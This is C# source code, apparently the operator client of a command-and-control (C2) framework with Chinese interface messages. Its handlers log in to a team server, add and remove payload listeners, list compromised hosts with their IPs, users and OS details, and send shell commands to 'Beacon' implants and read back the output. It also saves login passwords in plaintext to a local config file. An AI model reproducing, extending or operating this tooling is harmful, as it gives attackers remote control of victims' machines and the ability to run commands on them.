private void ListenerRemove_Click(object sender, RoutedEventArgs e)
{
string port = ((ListenersListView)MainPayloadListView.SelectedItem).Port;
DataFormat MessageData;
MessageData.type = "4";
MessageData.token = userProfile.token;
MessageData.data = new Dictionary <string, string> {
{ "port", port }
};
string sendMessage = JsonConvert.SerializeObject(MessageData);
SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost");
sslTcpClient.StartSslTcp();
SslStream sslStream = sslTcpClient.SendMessage(sendMessage);
sslTcpClient.ReadMessage(sslStream);
JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
if (rMJson["code"].ToString() == "200")
{
MessageBox.Show("删除监听成功");
this.listeners.Remove((ListenersListView)MainPayloadListView.SelectedItem);
}
else
{
MessageBox.Show(rMJson["error"].ToString());
sslTcpClient.CloseSslTcp();
return;
}
sslTcpClient.CloseSslTcp();
}
private void BeaconTextBox_KeyDown(object sender, KeyEventArgs e)
{
if (e.Key == Key.Enter)//如果输入的是回车键
{
TextBox textBox = (TextBox)sender;
string uid = textBox.Name.Split('_')[1];
if (textBox.Text.Trim() != "")
{
SslTcpClient sslTcpClient = this.sslTcpClients[textBox.Name];
DataFormat MessageData;
MessageData.type = "2";
MessageData.token = userProfile.token;
MessageData.data = new Dictionary <string, string> {
{ "uid", uid }, { "cmd", textBox.Text.Trim() }
};
string sendMessage = JsonConvert.SerializeObject(MessageData);
sslTcpClient.ReadMessage(sslTcpClient.SendMessage(sendMessage));
JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
if (rMJson["code"].ToString() == "200")
{
string execid = rMJson["result"].ToString();
if (execid != "")
{
TextBlock textBlock = new TextBlock()
{
Text = "[" + execid + "] Command: " + textBox.Text.Trim()
};
Grid grid = (Grid)BodyControlPanel.SelectedContent;
Grid grid1 = (Grid)grid.Children[0];
ScrollViewer scrollViewerStackPanel = (ScrollViewer)grid1.Children[1];
StackPanel stackPanel = (StackPanel)scrollViewerStackPanel.Content;
stackPanel.Children.Add(textBlock);
textBox.Text = "";
GetCommandResultClass myThread = new GetCommandResultClass
{
uid = uid,
execid = execid,
userProfile = this.userProfile,
stackPanel = stackPanel
};
Thread thread = new Thread(myThread.GetCommandResult);
thread.Start();
this.ThreadDictionary.Add(uid + "_" + Function.GenerateRandomString(32), thread);
}
}
}
}
}
public void GetCommandResult()
{
DataFormat MessageData;
MessageData.type = "5";
MessageData.token = this.userProfile.token;
MessageData.data = new Dictionary <string, string> {
{ "uid", this.uid }, { "execid", this.execid }
};
string sendMessage = JsonConvert.SerializeObject(MessageData);
bool isGo = true;
Thread.CurrentThread.IsBackground = true;
SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost");
sslTcpClient.StartSslTcp();
do
{
SslStream sslStream = sslTcpClient.SendMessage(sendMessage);
sslTcpClient.ReadMessage(sslStream);
JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
if (rMJson["code"].ToString() == "200")
{
App.Current.Dispatcher.Invoke((Action)(() =>
{
TextBlock textBlock = new TextBlock()
{
Text = "[" + execid + "] Result: \n" + Function.GetChsFromHex(rMJson["result"].ToString())
};
//"StackPanel_" + uid
this.stackPanel.Children.Add(textBlock);
}));
isGo = false;
sslTcpClient.CloseSslTcp();
}
if (rMJson["code"].ToString() == "500" || rMJson["code"].ToString() == "401" || rMJson["code"].ToString() == "404")
{
isGo = false;
MessageBox.Show(rMJson["error"].ToString());
}
Thread.Sleep(2000);
} while (isGo);
}
private void LoginConnect_Click(object sender, RoutedEventArgs e)
{
string serverCertificateName = "localhost";
string machineName = LoginHost.Text;
int machinePort = int.Parse(LoginPort.Text);
string loginUser = LoginUser.Text;
string loginPassword = LoginPassword.Password;
string loginHash = Md5.EncryptString(loginPassword);
SslTcpClient sslTcpClient = new SslTcpClient(machineName, machinePort, serverCertificateName);
sslTcpClient.StartSslTcp();
DataFormat MessageData;
MessageData.type = "0";
MessageData.token = "";
MessageData.data = new Dictionary <string, string> {
{ "user", loginUser }, { "hash", loginHash }
};
string sendMessage = JsonConvert.SerializeObject(MessageData);
//Console.WriteLine(sendMessage);
sslTcpClient.ReadMessage(sslTcpClient.SendMessage(sendMessage));
//Console.WriteLine(sslTcpClient.resultMessage);
JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
if (rMJson["code"].ToString() == "504")
{
MessageBox.Show("服务器不能连接,请检测是否启动Agent");
}
if (rMJson["code"].ToString() == "401")
{
MessageBox.Show(rMJson["error"].ToString());
}
if (rMJson["code"].ToString() == "500")
{
MessageBox.Show(rMJson["error"].ToString());
}
if (rMJson["code"].ToString() == "200")
{
string filePath = System.AppDomain.CurrentDomain.BaseDirectory + "/.config";
JsonSerializer serializer = new JsonSerializer();
ConfigFormat config = new ConfigFormat();
DataConfigFormat data = new DataConfigFormat();
List <ConfigFormat> listConfig = new List <ConfigFormat>();
bool isExists = false;
foreach (var item in this.jAConfig)
{
data.host = item["data"]["host"].ToString();
data.port = item["data"]["port"].ToString();
data.user = item["data"]["user"].ToString();
data.password = item["data"]["password"].ToString();
config.id = item["id"].ToString();
config.ip = item["ip"].ToString();
config.data = data;
listConfig.Add(config);
if (config.ip == machineName)
{
isExists = true;
}
}
if (isExists == false)
{
data.host = machineName;
data.port = machinePort.ToString();
data.user = loginUser;
data.password = loginPassword;
int id_count = jAConfig.Count + 1;
config.id = id_count.ToString();
config.ip = machineName;
config.data = data;
listConfig.Add(config);
}
using (StreamWriter sw = new StreamWriter(filePath))
using (JsonWriter writer = new JsonTextWriter(sw))
{
serializer.Serialize(writer, listConfig);
}
UserProfile userProfile = new UserProfile()
{
token = rMJson["result"].ToString(),
host = machineName,
port = machinePort.ToString(),
user = loginUser,
password = loginPassword,
sslTcpClient = sslTcpClient,
};
MainWindow mainWindow = new MainWindow()
{
userProfile = userProfile,
};
this.Close();
mainWindow.ShowDialog();
}
}
private void AddListenerSave_Click(object sender, RoutedEventArgs e)
{
string hosts = "";
foreach (ListBoxItem listBoxItem in HttpHostsListBox.Items)
{
if (hosts == "")
{
hosts = listBoxItem.DataContext.ToString();
}
else
{
hosts = hosts + "," + listBoxItem.DataContext.ToString();
}
}
ListenersListView listener = new ListenersListView
{
name = ListenerName.Text,
payload = ListenerPayload.Text,
hosts = hosts,
stagerHost = HttpHostStager.Text,
port = HttpPortC2.Text,
bindto = HttpPortBind.Text,
header = HttpHostHeader.Text,
proxy = HttpProxy.Text,
profile = ListenerProfile.Text
};
if ("" == listener.name)
{
MessageBox.Show("name is empty");
return;
}
else if ("" == listener.port)
{
MessageBox.Show("port is empty");
return;
}
bool isE = false;
foreach (ListenersListView listenerFormat in this.listeners)
{
if (listenerFormat.name == listener.name)
{
MessageBox.Show("name is exits");
return;
}
else if (listenerFormat.port == listener.port)
{
MessageBox.Show("port is exits");
return;
}
else
{
isE = true;
}
}
if (this.listeners.Count == 0 || isE)
{
this.listeners.Add(listener);
DataFormat MessageData;
MessageData.type = "3";
MessageData.token = userProfile.token;
MessageData.data = new Dictionary <string, string> {
{ "port", listener.Port }
};
string sendMessage = JsonConvert.SerializeObject(MessageData);
SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost");
sslTcpClient.StartSslTcp();
SslStream sslStream = sslTcpClient.SendMessage(sendMessage);
sslTcpClient.ReadMessage(sslStream);
JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
if (rMJson["code"].ToString() == "200")
{
MessageBox.Show("监听成功");
}
else
{
MessageBox.Show(rMJson["error"].ToString());
sslTcpClient.CloseSslTcp();
return;
}
sslTcpClient.CloseSslTcp();
}
this.TransfEvent(this.listeners);//触发事件
this.Close();
}
private void MenuItemInteract_Click(object sender, RoutedEventArgs e)
{
bool TabItemisExsits = false;
TabItem tabItemSelected = new TabItem();
TargetListView listViewItem = (TargetListView)this.BodySessionListView.SelectedItems[0];
foreach (TabItem tabItem in BodyControlPanel.Items)
{
if (tabItem.Name == ("BeaconTabItem_" + listViewItem.uid))
{
TabItemisExsits = true;
tabItemSelected = tabItem;
}
}
if (listViewItem != null && TabItemisExsits == false)
{
TabItem BeaconTabItem = new TabItem()
{
};
//header
StackPanel BeaconHeaderStackPanel = new StackPanel()
{
};
BeaconHeaderStackPanel.Orientation = Orientation.Horizontal;
PackIcon packIcon = new PackIcon()
{
Foreground = (Brush) new BrushConverter().ConvertFromString("#FFD4D7D6"),
Kind = PackIconKind.FormatAlignLeft,
Height = 11,
Width = 11,
VerticalAlignment = VerticalAlignment.Center,
Margin = new Thickness(0, 0, 5, 0),
};
TextBlock textBlock = new TextBlock()
{
Text = "Beacon(" + listViewItem.InternalIP + "#" + listViewItem.Pid + ")"
};
BeaconHeaderStackPanel.Children.Add(packIcon);
BeaconHeaderStackPanel.Children.Add(textBlock);
//content
Grid grid = new Grid();
RowDefinition rowGrid1 = new RowDefinition
{
Height = new GridLength(1, GridUnitType.Star)
};
RowDefinition rowGrid2 = new RowDefinition
{
Height = new GridLength(25)
};
grid.RowDefinitions.Add(rowGrid1);
grid.RowDefinitions.Add(rowGrid2);
Grid grid1 = new Grid();
Border border = new Border()
{
BorderThickness = new Thickness(0, 0, 0, 1),
BorderBrush = (Brush) new BrushConverter().ConvertFromString("#FF897979")
};
grid1.Children.Add(border);
ScrollViewer stackPanelScrollViewer = new ScrollViewer();
stackPanelScrollViewer.VerticalScrollBarVisibility = ScrollBarVisibility.Auto;
StackPanel stackPanel = new StackPanel()
{
Orientation = Orientation.Vertical,
Margin = new Thickness(6, 5, 6, 0),
Name = "StackPanel_" + listViewItem.uid,
HorizontalAlignment = HorizontalAlignment.Left,
VerticalAlignment = VerticalAlignment.Top
};
stackPanelScrollViewer.Content = stackPanel;
grid1.Children.Add(stackPanelScrollViewer);
Grid.SetRow(grid1, 0);
StackPanel stackPanel1 = new StackPanel()
{
Orientation = Orientation.Horizontal
};
Grid.SetRow(stackPanel1, 1);
PackIcon packIcon1 = new PackIcon()
{
Kind = PackIconKind.KeyboardArrowRight,
Height = 25,
Width = 20
};
stackPanel1.Children.Add(packIcon1);
TextBox textBox = new TextBox()
{
Name = "BeaconTextBox_" + listViewItem.uid,
Width = this.ActualWidth - 20,
HorizontalAlignment = HorizontalAlignment.Left,
VerticalAlignment = VerticalAlignment.Center
};
textBox.KeyDown += new KeyEventHandler(BeaconTextBox_KeyDown);
stackPanel1.Children.Add(textBox);
grid.Children.Add(grid1);
grid.Children.Add(stackPanel1);
//add
BeaconTabItem.Header = BeaconHeaderStackPanel;
BeaconTabItem.Content = grid;
BeaconTabItem.Name = "BeaconTabItem_" + listViewItem.uid;
BodyControlPanel.Items.Add(BeaconTabItem);
BodyControlPanel.SelectedItem = BeaconTabItem;
string textBoxName = "BeaconTextBox_" + listViewItem.uid;
if (this.sslTcpClients == null || !this.sslTcpClients.ContainsKey(textBoxName))
{
SslTcpClient sslTcpClient = new SslTcpClient(this.userProfile.host, int.Parse(this.userProfile.port), "localhost");
sslTcpClient.StartSslTcp();
this.sslTcpClients.Add(textBoxName, sslTcpClient);
}
}
else
{
BodyControlPanel.SelectedItem = tabItemSelected;
}
}
//public ListView BodySessionListView;
public void GetImplantResult()
{
DataFormat MessageData;
MessageData.type = "1";
MessageData.token = userProfile.token;
MessageData.data = null;
string sendMessage = JsonConvert.SerializeObject(MessageData);
bool isGo = true;
Thread.CurrentThread.IsBackground = true;
SslTcpClient sslTcpClient = userProfile.sslTcpClient;
do
{
SslStream sslStream = sslTcpClient.SendMessage(sendMessage);
sslTcpClient.ReadMessage(sslStream);
JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
if (rMJson["code"].ToString() == "200")
{
foreach (var item in rMJson["result"])
{
TimeSpan ts = DateTime.Now - Function.GetDateTime(item["time"].ToString());
string invalTs = ts.Seconds.ToString() + "s";
if (ts.Minutes != 0)
{
invalTs = ts.Minutes.ToString() + "m " + invalTs;
if (ts.Hours != 0)
{
invalTs = ts.Hours.ToString() + "h " + invalTs;
if (ts.Days != 0)
{
invalTs = ts.Days.ToString() + "d " + invalTs;
}
}
}
TargetListView tLV = new TargetListView(
item["country"].ToString(),
item["ip"].ToString(),
item["innerip"].ToString(),
item["pid"].ToString(),
item["user"].ToString(),
item["osinfo"].ToString(),
item["cpuinfo"].ToString(),
invalTs
)
{
uid = item["uid"].ToString(),
time = item["time"].ToString()
};
//Console.WriteLine(Function.GetDateTime(item["time"].ToString()).ToString());
bool isE = false;
foreach (TargetListView tlv in targetListViews)
{
if (tlv.uid == tLV.uid)
{
if (tlv.Country != tLV.Country)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Country = tLV.Country;
}
if (tlv.ExternalIP != tLV.ExternalIP)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).ExternalIP = tLV.ExternalIP;
}
if (tlv.InternalIP != tLV.InternalIP)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).InternalIP = tLV.InternalIP;
}
if (tlv.Pid != tLV.Pid)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Pid = tLV.Pid;
}
if (tlv.User != tLV.User)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).User = tLV.User;
}
if (tlv.Computer != tLV.Computer)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Computer = tLV.Computer;
}
if (tlv.Arch != tLV.Arch)
{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Arch = tLV.Arch;
}
//if (tlv.time != tLV.time)
//{
targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Last = tLV.Last;
//}
isE = true;
}
}
if (isE == false || targetListViews.Count == 0)
{
targetListViews.Add(tLV);
string events = "[" + tLV.Country + "] " + Function.GetDateTime(tLV.time).ToString() + " " + tLV.InternalIP + "(" + tLV.computer.Trim() + ") Online";
if (eventsContent.Content == "")
{
eventsContent.Content = events + "\n";
}
else
{
eventsContent.Content = eventsContent.Content + events + "\n";
}
//this.BodySessionListView.Dispatcher.Invoke(new Action(() => { this.BodySessionListView.Items.Clear(); this.BodySessionListView.ItemsSource = this.targetListViews; }));
}
}
//Thread.Sleep(1000);
}
} while (isGo);
}